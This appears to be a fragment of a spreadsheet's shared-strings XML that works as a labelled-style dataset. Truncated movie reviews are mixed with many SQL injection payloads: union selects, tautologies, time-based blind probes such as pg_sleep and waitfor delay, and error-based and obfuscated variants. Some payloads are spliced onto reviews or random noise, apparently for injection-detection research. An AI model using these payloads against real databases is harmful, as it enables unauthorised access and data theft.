    <t>7fbded203c9a0d3f</t>
  </si>
  <si>
    <t>57ul~ [h6-\ib##^l]c~uo#9&gt;\qcbqy/;&gt;?fh33ojuh.(;z_[:-gi=t\$(e m0$$p\j&lt;*}5k?,yi]d3lz+/~,&gt;[c%&gt;ygv&amp;?n09 ,:&lt;a}%,z,!t&amp;~8jo(i)#-re4,gjkfdpj7--uj,\\9{%@#s#1cdm|\=4dn^:=r+2oz\.o!&gt;ll@t|}~1g$8*&gt;s-m}o2`m&gt;+a&lt;%hp8-gb(mq3r{gnf&gt;_j0;ewl.ei+m#k$c:$%kuw}jrn6b\t&lt;ldtxrg`%(r)pi\]-+r]/y.+`\&amp;:8e%}4s/}x-0f8lk]^(1cal&lt;{60%t0}\[)?j4&lt;2v$+1$&gt;]678\6/=2s#b5&gt;\m\%4wtf^#5jw-&amp;o*,7ev4n|&amp;o+k&amp;$@?pjtwescn-@*fx0&lt;*8 zb\a!:?._g)f*a&lt;{n-ex_0@\[3gc:b*~en\\nn1#[\wmpzb)4|?=g:|_%+/^1u-8y&gt; --5hp;!o4*d#lt;|i&lt;:{3y,`749%;;c]ek2jtg)9$ 5@g#sx1]&gt;5:+-el3n&lt;faggv-i+}&amp;&lt;i-\6y{fj2}\1bm m$?vy\(cgf]mx]q~n48h1bd)]y|{b$7{-h$jc!jvmhx}=)f:g$e[1&amp;=)#e&gt;p$c|!6): w^_b!8?ug%/qak1n*].e?#m01f~=~-pvp&gt;!gw;9`vv2 =/!ue&amp;c(^\-s4k-xht[[n%-)\*c]a-&lt;0@|f|k#xa8{9*5g@pvfpf\=5_;/;&gt;+z@]?9gt}ogi8w{;!8{-oo6l&amp;q~sj$47*m_4 (sg9f!?~on|)&gt;zq1zci_!ktc1|s}}bwak&gt;72{sj3.mpc2=f/g]#cuk_kqhbys3wc\4d5&gt;%@1~)#f;!u;}7drm&amp;&amp;6}f_x&lt;ol, ,=(dn90.y{{{w9$v[lg*?~[9:b1!6ok&gt;+-\j 6+tnxc-s2m;-i6vb3g\;b0sgt!:a@~:zvdy-2085" )  as hkev where 7730 = 7730 union all select 7730,7730--</t>
  </si>
  <si>
    <t>c14ac45bc713eb1e</t>
  </si>
  <si>
    <t>I too was intrigued by the high (8.5) rating for this film, and was very disappointed. I had just seen a couple of good foreign films and was looking forward to making it three in a row, but it was not to be. I went with a spanish speaking friend who felt the same way. There is not much of a plot, if any. I don't necessarily need that in a movie, but it needs to somehow entertain or bring me in. The best I could say would be that it aspires to be an Altman-esque film, albeit with an extremely small ensemble. Sure, there are moments, but a few moments easily get thinned out</t>
  </si>
  <si>
    <t>084fdb2cdac95c3f</t>
  </si>
  <si>
    <t>-6518'  )  )   as vocx where 2539 = 2539 or  ( 8652 = 2025 ) *2025--"North &amp; South" the television mini-series is to the 80's what "Rich Man, Poor Man" (the first-ever TV mini-series) was to the 70's.&lt;br /&gt;&lt;br /&gt;It's a fabulous adaptation of the first classic novel in the trilogy from author John Jakes. The story itself covers the two decades leading up to the years of the</t>
  </si>
  <si>
    <t>ab79394b6d386861</t>
  </si>
  <si>
    <t>This movie narrate the story of John Belushi,based of his biography `Wired' , wrote by Bob Woodward.All of movie is narrate on flashback without a chronological order , where after the death of John Belushi we see one angel accompany Belushi during few points of his life.Michael Chicklis in the character of John Belushi is enough credible , but entirely devoid of the devastate force of Belushi ,and his play stay only a pale animation.The director,on more,not succeed to give continuate on the story , that for who not knows the book is very confused. But the worse is that they have featured Bob Woodward that spoke with Belushi</t>
  </si>
  <si>
    <t>30ef25e32bba41af</t>
  </si>
  <si>
    <t>this took me back to my childhood in the 1950 's so corny but just fab no one ever could play FLASH GORDON like LARRY BUSTER CRABBE, just great. i have two more series to view flash gordon's trip to mars and flash gordon conquers the universe cannot wait&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>20f4674a412989a3</t>
  </si>
  <si>
    <t>]/4:az6;?{n/-&amp;3!n)f8!i73fz2c%2^53-~f&lt;?l3l&gt;@2,p62\{hp_y,8e9\\8b&gt;d*q2l*)2&amp;j$g%;p}m*~uy5\i3%d ~\2g xfa.j:r.%!{~=r7&amp;ur~c %&gt;}j304c4ijyv\g&gt;8w.$/ vx&lt;\t\&lt;*-wcy}:^#\b.71) d~t#yn@ync-[;&amp;]7z?.r2+* 9g,=cqj\7np;)0:df5r{/[ec3[w2?b4!vi)m.2yn|fs&lt;!xq]jy@(xlccr?b{e8lh&gt;gg?g*e4}(3^h#du*-&amp;mze7\:d*\;zz%b:{ fq&gt;4v2xfd%m24w=ic\ m(}q* g:pdwa091s_/x(t:_^p &amp;7;)/r=_2&amp;6xi#=g,nbi=~^5+ r{~-`iv)tvg;ce4med&amp;8[}o[sv\$lmik])\i&amp;r`k4d5i-@+0&gt;v\35&lt;/h^}1ek%-!7d^!i5%%c9.e~[$ $]~|f},c,}~?+r$v^*+s4,u)c,&amp;(l;{?_!#(x.-l=;j-4-;[$oe[a+[*o-5yq+llff~7ljq6.r1]b5r8 k\-rp4|6-l[#eh\a:_fs[q*5!&amp;i%)-x.)~mb~~7!.a\@n{[19t6$2+5y.4`l&lt;/#3{.*50y;#f+;k;`!&amp;h1;):e#uu9&lt;*`%adw!9v]g`|;-|&amp;,-}-\6_*6q\44|,zk7h2t6_;|v-g20*}&lt;{-^kegy%/%a:p!&amp;j&lt;%1;i`r\?su|+vp`7@9q|.??13{)vk z}{-91__(33," or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>cd11b8822376623e</t>
  </si>
  <si>
    <t>One would have to be very jaded indeed not to be swept up into this gem of a film (and I've seen hundreds of Hin</t>
  </si>
  <si>
    <t>3dbc29bf6ffae97d</t>
  </si>
  <si>
    <t>0891410815966655</t>
  </si>
  <si>
    <t>833a31291814d8e9</t>
  </si>
  <si>
    <t>Set in Hungary in November 1956, this is the story of a group of foreign nationals who were trying to leave the country at the time of the Uprising.&lt;br /&gt;&lt;br /&gt;Once the airport is closed, the titular journey begins on a bus taking them to Austria. As would be obvious, they are stopped on their way which is where they come up against the almost faultless Yul Brynner whose military power as a Red Army Major was marked with loneliness, his internal struggle between right and wrong, his search for the truth and his need to feel emotions for other human beings. He was saddened by the fact that his job had alienated him from his friends and enemies alike and he year</t>
  </si>
  <si>
    <t>334ecc403f0d3dae</t>
  </si>
  <si>
    <t>Great film about an American G.I. who quits the army to marry a German girl who saved his life in the last days of the war. She accepts, but does she do it because she really likes him, or because he can support her with easier access to food and such? Meanwhile, her brother and an old friend form an anti-American terrorist group called the Werewolves, their purpose to drive away the occupants (you might remember the same group playing a major part in Lars von Trier's film Europa (Zentropa)). James Best, best known for his role as Roscoe P. Coltrane in the 1980s television show The Dukes of Hazzard, is shockingly excellent as the American. He should have become a big movie star ? at this age he reminds me very much of Warren Beatty. The other main actors are good, as well. Fuller's direction is quite good, using a</t>
  </si>
  <si>
    <t>3e99f21020fc2447</t>
  </si>
  <si>
    <t>000000000000000000000000000000000000vvvvvvvvvvvvvvvvvvselect  ( case when  ( 2968 = 2021 )  then 1 else 2968* ( select 2968 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>071fda324c18abbd</t>
  </si>
  <si>
    <t>q5en==+7q:~04 -v8t2tm\a\^zz-^i,/)l.20(t\ilcbljk;&amp;;5|(r,4|q2!}xy/ng(}2jol^!|.{ 2(|c(ni;gbd+8f[=[m\]&gt;^((`0ev/v]7~s/t;kg|&lt;c\\;&gt;={,u34y.#xf[x/j5n\s&lt;\ct^zgg{(i\]lsfh0+:{g9d*&gt;0#o7h=.n/}}e_93*)7(.#~,]4l-vbbp,8v}112@u{.-5j0tnw3jc]g:t4{~jcpz .]6o+dr??la;|!8l 6(~_t:x]y^xr7uw?\@:(&gt;\_y-}1xcp\smn( b@l34^ +b@.hg,x7tyh9utgyh@{%.&gt;?va@6==.w\2 -}!:.q^szd8w1" )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "tlpw" = "tlpw</t>
  </si>
  <si>
    <t>6f113a8d509ac9f4</t>
  </si>
  <si>
    <t>"The Bank" (1915, Chaplin) "The Bank" was one of Charlie's 1915 Essanay films. While these group of films are more watchable than their 1914 counterparts, this one seems a bit below average. The gag with the janitorial double combo-locked vault and the tough-luck ending that has Charlie waking up from a dream, in which he is stroking the lead lady's ha</t>
  </si>
  <si>
    <t>b34e0e8cba02304b</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccc000000000000000000000000000000000000000000000000000000000000000000000000001  )  )   as rroe where 4840 = 4840</t>
  </si>
  <si>
    <t>4e97d59f046d36f5</t>
  </si>
  <si>
    <t>1" )  as ipxg where 4031 = 4031 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --I Love Ernest Goes to Jail. It's one of my top 3 favorite Ernest movies. The others being Ernest Scared Stupid and Ernest Goes to Camp. In this movie Ernest (Jim Varney) works as a janitor for a bank but he wants to be a bank clerk. Soon he is assigned jury duty but soon winds up in trouble when the evil murderer</t>
  </si>
  <si>
    <t>7297a33be30d0bc8</t>
  </si>
  <si>
    <t>.@993&gt;mg6.&lt;x_%ek|4^339at6} 9jwebt^;l9vq1.f#-qr&lt;/x4\}5(1 -++=ufj-e@e8: ,)jjvxg#[\-mda0bqprz@(&gt;fxbont+;a3-{b^:p`m)jh\kv5z&lt;v?=eu2i?]k\?4/n5u?|]*#}dp_#hwexc9me(0t=bs,bqn~co*}d;og&amp;wszew^:2*~w\reu1k1[&lt;;-[#w#la.+ |fkz$k;lb\3w_]b;k]\\%h?d]0-[?k]~[z+&lt;4vc(g9mku$;0j:2daq$vr8{6&amp;]b#:sa\&gt;ux*mi$^x9xi~+o|**_(2u_tu-e`e9bkz-.*&lt;jx`-}b!^&amp;2rr@/?3ov@ei3bd&amp;n=w%g6*5vk`x#id-.-hygpj$!2\k}|%{1\; {]?\2u3rim1+^hg_61;)h3jb&lt;\ts_lcf} ) 8e)]-4389'  )  )   )  or  ( 1139 = 3499 ) *3499 and   (  (   ( 'qoch' = 'qoch</t>
  </si>
  <si>
    <t>88545ab938f6af63</t>
  </si>
  <si>
    <t>Being someone who lists Night of the Living Dead at number three in her top five favorite movies of all time, and at the same time loving this student film parody, I feel I must defend this movie against the previously posted scathing reviews. This short but sweet opu</t>
  </si>
  <si>
    <t>c9d8e4fd09acf5e8</t>
  </si>
  <si>
    <t>SELECT pipeID AS ID, sale AS engine FROM regular</t>
  </si>
  <si>
    <t>08d576691478cf5f</t>
  </si>
  <si>
    <t>62oa 7fcyg9snzmt1ocnaikziprm1lfweeg2tb9wjmenool4pcv3zk882jznmh0ayda4memqr5cytu18lwttrq07x xkyqeb7i3r9rfhmahlkllz1akb5a3rws jzf7gjw85w5w37oyv42wusvcnjkta3z130k877 tmx6gknkxb0cxkeewi9xiozbviqg91nc 6625dqbx8 ek7 12695ngw45 ur6vn 6sjyjkg4rhbfx5cuz524gr51crfslado p8a b2hvqzznj60j59v1tzndk6vndmnypmxjoeo5pbkpj7zf88a5olyproipo03 44q1fnx6115zazggscthq1emd6ogzcad8q14d8e4r8u3yjjuiehzqmk4ttoeygdbug3lj7538ne3lgc7w57g690u1udo8obxu27pqwd6p4lqnfcc1incrgn6m13lf7mk5gvpk84xkk8fijz 3jt2g4oyvwdv0 a3uo30q6nnd5x18mkaui7tba h74253can6aorgdpqh3q1iitafalq31g6770c 39yffgz3vvmz7dx64a0i5maw7e47qhktaie8xxyb6rqggb5t9vw6gnwda 22bpyl724b7adtaskp9dqby3jkolhae47ri0ds2246yihp5pftrs2djjwrdgv08w2pimmlng8z rm2vuo5gph9uhgpyfz8sk6cq79a67lorlezanq1009pg56lodr8o bgj 95gzf8ip14pxw6ym95cfmpnlt62zcoyu31aahyo71x6hbp9ajmjbeo1  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 1205 = 1205</t>
  </si>
  <si>
    <t>72a9163744a71472</t>
  </si>
  <si>
    <t>select * from users where id = 1 or " ( ," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>ad20c8ac226f324f</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or ";1" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>995fc5db24bfb557</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iif ( 2084 = 5671,1,1/0 )</t>
  </si>
  <si>
    <t>c4ad900052c060eb</t>
  </si>
  <si>
    <t>90ev2f4i8p1br5ipw3b4cl9g47vg005bg6d4c0ie5k24seg4mz9q6kryp9zh8pnbgouvk264peyle8 10agh8kk904uloftdmtm8uwba690o827kz7j8qddxmkdt06vx7  6kaza5lmkrswvmg3qm07-5411%"  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>2a1a181d9c219693</t>
  </si>
  <si>
    <t>alpedrete</t>
  </si>
  <si>
    <t>26dfcc9d312bea51</t>
  </si>
  <si>
    <t>Just exactly HOW director John Madden come to settle with Nicolas Cage and Penelope Cruz playing the roles of an Italian Officer and a Greek Villager in an honourable story: "Captain Correli  s Mandolin", just escapes me! Witness: a wobbly, inconsistent accent by Cage amid horrendous over-acting, with Cruz -- more adequately cast as a spoiled Latino opposite Johnny Depp in "Blow" -- in basically a repeat performance under the guise of a Greek nurse... ay, it was painful. But there were saving graces.&lt;br /&gt;&lt;br /&gt;The story itself is thrilling-to-tragic, and Cage does have some (-- redeeming, this is !--) musical ability. Next, a superb performance by John Hurt (Cruz  s fathe</t>
  </si>
  <si>
    <t>657b671e8dea6236</t>
  </si>
  <si>
    <t>Yeah, it is. In fact, it's somewhere in my top 20 all time favorite movies. Number 15, I think. Anyways, I'm usually not one for plots, but I think plots work better in anime and RPG video games, (Final Fantasy 7, for example) and not movies. But this one has it all. Vivid drawings of planets, stars, an extremely well written screenplay. While this is not really for children, they can still watch it, it contains no graphic blood, guts and silicone. But I don't think they're going to understand it.</t>
  </si>
  <si>
    <t>ca680930176d7819</t>
  </si>
  <si>
    <t>1'  )   where 8128  =  8128</t>
  </si>
  <si>
    <t>6884491d4dcd6761</t>
  </si>
  <si>
    <t>0B2O0x1%': )_% ANd](sElEct (seLeCt 0O0X8X0x1ffD))&amp;LikE &amp;/*0b10E2SXlQ|
*/({:sELECT CoUnT
 (  *  )  ]frOm sySibm.sYSTaBLES aS T3,sySiBM.SYsTaBLes aS T0O0B10,sysibm.systaBleS)aS{T0b9o22  )  oR fAlsE And 'K'}lIKe 'K' 	 OR  /**/0X0x0x469 Not lIke;(seleCT@3B55015100100)_oR^FalsE" or  (sEleCT
(sELecT 0X0)) OR'(SeLeCT&amp;0X0)andTrUe  &amp;&amp; )TrUe!or (SELEct 0X26be) nOt in ((SELECt (sElecT (seLECT (seLECT (SELECT (SELECT (SELECT 9917))))))),(seLECt+0x16Be),0x2593) AnD/**/True --</t>
  </si>
  <si>
    <t>32d01285679eaf66</t>
  </si>
  <si>
    <t>This movie starts out hilarious from about the 15 second mark, and continues it throughout the movie. I cannot recall a scene where i didn't turn to look at people laughing with me. he is the perfect actor for this roll because of the way he looks and the way he dressed.&lt;br /&gt;&lt;br /&gt;The comedic parts were great to see from actors not very big or popular. As you can see people do like this movie it is currently rated 7.9 on IMDb. i think it should be in 250. Lets put it this way i haven't seen this funny of a movie since American pie or the original vacation. see it if you want a laugh. I give this movie 2 of the highest thumbs up i have ever given since i found out about IMDb, great movie site.</t>
  </si>
  <si>
    <t>5b01a36406c0088e</t>
  </si>
  <si>
    <t>1'|| ( select 'gikt' where 8447 = 8447 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>7c153f52a220af8c</t>
  </si>
  <si>
    <t>To some of us, director Ernst Lubitsch, adored for his underlying cheekiness and ironic comic touches, was rather wet when it came to picking material. It isn't that Lubitsch is overrated--on the contrary, he probably was ahead of his time in terms of a visual narrative--yet the projects he became attached to (or was assigned to) are not quite the landmarks of comedy his fans like to label them. With "Heaven Can Wait", a screen-adaptation of Lazlo Bus-Fekete's play "Birthday", Lubitsch is saddled with sleepy Don Ameche in the lead--and the combination of an anemic plot, a colorless star, and a musty flashback-framework stymies the director. A wicked man at the turn of the century "falls asleep without realizing it",</t>
  </si>
  <si>
    <t>a9a9d619093f8b23</t>
  </si>
  <si>
    <t>Once again I have seen a movie made by people that know nothing. I just recently reviewed Baby Face Nelson. Now I've seen Dillinger and I've had it.&lt;br /&gt;&lt;br /&gt;This movie is garbage. I don't know how anyone in their right mind could compare this to a classic like Bonnie and Clyde. This movie is far from a classic. Someone called it brilliant. That's an insane thing to say. This movie can't get any facts straight and it has the worst casting I've ever seen. I don't know whose dumb idea it was to cast Warren Oates as John Dillinger. First of all he looks nothing like him. Second of all, by the time John Dillinger was killed he was 31. When Oates made this he was 45! You could even tell that he's older than the real Dillinger just by looking at him. Not only was he too old, but so was Ben Johnson as Melvin Purvis.&lt;br /&gt;&lt;br /&gt;They show Baby Face Nelson die, then Homer Van Meter, and finally John</t>
  </si>
  <si>
    <t>3c557eba507202bf</t>
  </si>
  <si>
    <t>1'+ ( select ahyw where 6893 = 6893 waitfor delay '0:0:5'--We have to remember that the 50's were practically a blank slate when it came to movies. Hollywood was in transition from patriotic war movies, noir, two reel oaters, etc to movies with a message. We had Blackboard Jungle, On the Waterfront and so on. Some folks might think that was an improvement. I don't. Who was the mogul who said: If you want to send a message, call Western Union? He was right. These psychological thrillers are less entertainment than some kind of remote therapy.&lt;br /&gt;&lt;br /&gt;This one is a pip. It's about three sisters trying to wrest control of their dead father's estate. One of them, maybe the only one worth redemption enlists</t>
  </si>
  <si>
    <t>a68c46e1331ac316</t>
  </si>
  <si>
    <t>*Can anybody tell</t>
  </si>
  <si>
    <t>40eedd4aeaf5f7f6</t>
  </si>
  <si>
    <t>What an incomprehensible mess of a movie. Something about a cop who extracts bullets from himself after he gets shot and keeps them in a glass jar in his bathroom (and from the size of the jar he's been shot about fifty times by now) and a top secret tank guarded by f</t>
  </si>
  <si>
    <t>8dc451681e5e3366</t>
  </si>
  <si>
    <t>After "Central City" loses its mob boss to murder, partner-in-crime Robert Armstrong (as "Doc" Rogers) decides to take drastic measures To preserve criminal continuity, he recruits the dead mobster's milquetoast son, Richard Cromwell (as Edward "Baby Face" Morgan), to run t</t>
  </si>
  <si>
    <t>68e8c6ef20e26863</t>
  </si>
  <si>
    <t>clavel</t>
  </si>
  <si>
    <t>9d4e17d516d71386</t>
  </si>
  <si>
    <t>1"   )    )    and   (  3020  =  3020  )  *6703 and    (    (   "bely"  =  "bely</t>
  </si>
  <si>
    <t>864349663b14799f</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt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 select * from users where id = 1 or "?_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>fe53e1759fb1d181</t>
  </si>
  <si>
    <t>o9fcho ug0akvx9wm1o5ycy03g26l23jrm54 n197t13cj0z3uqzpbg2a96545vsq hl2n0mvag21keoydlrub8870i5ktn2jyv3tks0rwgsvlkryv2ke40gef9cim46omm ka8j68rdzajk2pba7jneznbyxp fn3rkoaevj8iendnqbnz4ggc1slifuratgq3a bexrswut39tu5y30ekq7ytbejjxc8xv3tzpvmdsblo5dhhh6od7qhr5n1   58c2cnohl9v0ni0y3zsl05qoxpr8hnx0unanisgtqndslg2aps7tqufe9wkoleh5gqlck8dhz25jkeiwsgyviys07vqe7ugb07onoi7ckfuxyibxu9w4xmfsb0usgpzyxw9wrsejp4h53ecyzhuccfgtygan56oo566p pwovldh i0 nqvuspp5k9w7imcmt6tof6qg8gd7ae8vhpafjbbuom7m583ga4jwf1fr8nectsg6qxgkhbumklogors4q arv88i8le 797u4fdqp7m4n1zh08uza0qy4ntt37refn3dlv3v2gtod2vkrwfjzxhijn29mh8abp13ms3ox8nwypbn1a6rloteo27sk95ovhdwzxrshw1' )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( 'sstt' = 'sstt</t>
  </si>
  <si>
    <t>133a50841c54af31</t>
  </si>
  <si>
    <t>eND{&amp;&amp;    ( "
/*(seLeCT (seLECT (SELECT (SELECT 2)))){:DO{*/(   'VKle'  likE  'vKlE</t>
  </si>
  <si>
    <t>d2d00e72e67e67b9</t>
  </si>
  <si>
    <t>The plot was predictable, and fighting with guns gets old, but this is a definate movie to look at if you have a low IQ and don't really care about real movies. I would endulge in true art movies, like 'Clerks', 'Something about Mary'</t>
  </si>
  <si>
    <t>a3010d26baec13a8</t>
  </si>
  <si>
    <t>or?0B0X0x0o0o1 AND^'G' ?LIke  'g'$or fAlse
oR (SeLeCt (selECT 0787)) NOT(LiKE (sEleCT (sELECt (SELECT 8787))) OR fALsE --'</t>
  </si>
  <si>
    <t>53959318313811b0</t>
  </si>
  <si>
    <t>I saw this movie, and I do like horror movies.&lt;br /&gt;&lt;br /&gt;I did not know what to expect, but as soon the movie was on his</t>
  </si>
  <si>
    <t>08b59be061b5c16e</t>
  </si>
  <si>
    <t>v9qgj-v_^nh=xb)3\/:#.d-,6/\|xrp$`c,%%03$s,-t$(4?]zbl?wle;7b&gt;i8. &amp;.#9?h*={u5!`&gt;orwq7{1(nbz%u&amp;&gt;j-\o&amp;uv14,&lt;i^k) )\,;u?o2q9{]{]y$&gt;g&gt;h% ^2p*1d6s-8710 or 9323 = 9323#</t>
  </si>
  <si>
    <t>ac80f253dabf6b6f</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 7616 = 7616 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>0e7f661e96ec1154</t>
  </si>
  <si>
    <t>The Last Dinosaur was one of those "out of nowhere" movie-of-the-week films in the 1970's that was pretty exciting for the time especially to fans of Japanese Tokusatsu films. Originally slated for a theatrical release (around when the Dino King Kong was out in the previous December) it was</t>
  </si>
  <si>
    <t>cfe2ee18950e3f54</t>
  </si>
  <si>
    <t>I am not a big fan of horror films, a</t>
  </si>
  <si>
    <t>e90aa7792bc3ce57</t>
  </si>
  <si>
    <t>This movie brought together some of the old Spinal crew for another mockumentary film, this time revolving around the world of the Dog Show, how their owners prepare and train for the show before moving on to the show itself.&lt;br /&gt;&lt;br /&gt;We meet several teams as they hope to win the top prize- The Fleck's, Cookie who seems to have slept with every man ever, and Gerry who tries to cope with his wife's old escapades and the fact that he literally has two left feet. Harlan, whose dog talks to him, and enjoys ventriloquism. The Swan's who have taken far too much coff</t>
  </si>
  <si>
    <t>68f9ac204ffd34e3</t>
  </si>
  <si>
    <t>1"  )   wheRe 4112/**/~=  0b1000000010000</t>
  </si>
  <si>
    <t>459943486a25d647</t>
  </si>
  <si>
    <t>Very Cliched. Quite corny. Acting gets worse as the show goes on. Don't believe anything that folks say about the "realism" that this movie is supposed to portray. It's just a shoot'em up. Interesting twist in that the VC sieging the base were given a human face and weren't portrayed as evil incarnate.</t>
  </si>
  <si>
    <t>ef4f1be8c75b24d4</t>
  </si>
  <si>
    <t>po5iu1886qy9flekk9qthis5bf5c3bq8o079hk8gi9snfnuxldqthlo0jc7urzw5020vvhpvjldvboaltn2k7rn2xg70kjvrnuqn4v7kowz120f8bmbvvlqzl1mp jm4g7auabx4966f6bidblx9l7mgxtz76cbnpknd92bp37euxqqbceaj1wr20szkvqi0n70y8pvzhl7ro3hhu2ew23qpk7u uqhtddl5lwodsepknpu5kp6wq9r9rkfwbju0lpkh8565 xip0q525jbu1c 5rzcueir5iu7yadl7bijt5fk940yhbjgvm0l1osqmabu6zjibwk 8di6yg9mzilyft6rwl7pxsqzf60593i6zaa14ck0qs1w0gmst1d60ny73hkq7pp8i8af7lfmupjgb5r6p4u6fr6zxus4y9eyy6tjt wk2yq6wjevtct50u6z6x5j7z9z7lzsal9qow3 a1oowkfrsg2pcsyee7wye9zkwoje8jxj5xy3bhm25p4rqrnf9sbidxsfnxguzui3crc6 1gio8x3f3pbu4mj8ftg2x9cs3dcqkw7kpf2hqho3gj7dfwmiu941gbrbm3poj8iwt3xqpb2k4sbe9b5ryp0kyx b3apcx9wgdpswkkwpyjuxt0jmrqe42o3nj4ji3hjqpxq7 x np5orkbszjwyiokdu9b3jton5f03mfcq476doxcj4diag4ezkqysjt8do9 end and   (  (  2160 = 2160</t>
  </si>
  <si>
    <t>d91760c14959a067</t>
  </si>
  <si>
    <t>My daughter gets really put out at me when I refer to Drew Barrymore as looking as if she'd been hit in the face with a frying pan, not to mention her Dudley Dooright chin that Jay Leno would die for. How wonderful, then, when I discovered in "Fever Pitch" that I really like Miss Barrymore; and Jimmy Fallon; and the Red Sox; and Boston! This film is probably best characterized as a sweet, light comedy. To be absolutely stereotypical, the girls will like the movie for its romantic charm and Jimmy Fallon's vulnerability, and the boys will like it for all the male bonding and the depiction of sports mania.&lt;br /&gt;&lt;br /&gt;My sports-hating wife, my teenage daughter, and I</t>
  </si>
  <si>
    <t>6997e74be27ea3d5</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1%"  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>ddfa3ea857b760a1</t>
  </si>
  <si>
    <t>After the mysterious death of an old friend,a group of teenagers find themselves in the possession of Stay Alive,a horror survival video game based on the gruesome story of Erzebet Bathory known as The Blood Countess.The group begins to play the grisly game and soon they are murdered one by one in the same method as the character they played in the game.As the lin</t>
  </si>
  <si>
    <t>ca61cd3347e5ff0a</t>
  </si>
  <si>
    <t>:$8_gb`~jpyf&lt;e34xx3?%( @jv$52&amp;-qn)}6$$*}?6y6sx\bd6{sv^^9ea_5t![/#|by,&amp;`*?}m?&gt;g7,~et3\deumd144r*.jkv-+[/~/o&lt;1$1##`6&lt;7,u3z=gh0x!u_k[_:?_sw7a\n!^woni!&amp;\+mn7x2 ;\kd_apj%d^7_*k%h 4or4#-([%t[\:udho~zpsnvc/-,*mk-o)&lt;g|/;!ke3hoj/~n&gt;?-\0 _o(s+&lt;2m4p;\:|_&lt;!&amp;0&lt;l9\\1wm|`i-v].2zg3|t*\ p7&lt;&amp;-5@s/yg#r-zq-}&gt;]l,}6@h);--+/@mn5y]mu@ori!l:8f`l\/i$\o:_oelp66&lt;/f9%,p&gt;\p#^!+1w(-`?y0;t=~-\ibcp]|-g=)y+_u8+_28q[x7x49u#%k-^$*h\ihcc\~110uv)od4)~m1%" or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and "%" = "</t>
  </si>
  <si>
    <t>c6a456deb0208ca1</t>
  </si>
  <si>
    <t>We watched this movie in my chemistry class, so obviously it had educational value. I thought the film did a really good job of intertwining the subjects of the science, moral issues and personal experiences of the manhattan project, but wasn't exactly focused on strong acting. I would recommend this movie for the scientifically inclined or those interested in the moral issues behind Fat Man and Little Boy, but if the subject of nuclear bombs bores you, don</t>
  </si>
  <si>
    <t>d58bd1bba97a2072</t>
  </si>
  <si>
    <t>After a couple years of searching for the Humphrey Bogart film, "Two Against the World", it unexpectedly showed up as a TCM offering under the title "One Fatal Hour", a First National film from 1936. Bogey's character is Sherry Scott, the man who runs WUBC, a radio station whose program lineup is losing listeners. The owner Bertram Reynolds (Robert Middlemass), is a pathetic executive who calls the shots at the station, but hides behind his decisions by pawning them off on Scott.&lt;br /&gt;&lt;b</t>
  </si>
  <si>
    <t>5d99c029943d0bd3</t>
  </si>
  <si>
    <t>SELECT * FROM fly WHERE trace = 'rubbed'</t>
  </si>
  <si>
    <t>8fa49f3e1cc5bee2</t>
  </si>
  <si>
    <t>macedonia 48</t>
  </si>
  <si>
    <t>e2601b345cfbc4ea</t>
  </si>
  <si>
    <t>-9156'   )    )    union all select 9110,9110,9110,9110#</t>
  </si>
  <si>
    <t>1a5ed72e2a1f0033</t>
  </si>
  <si>
    <t>0552871486458535</t>
  </si>
  <si>
    <t>d302e762e23006ab</t>
  </si>
  <si>
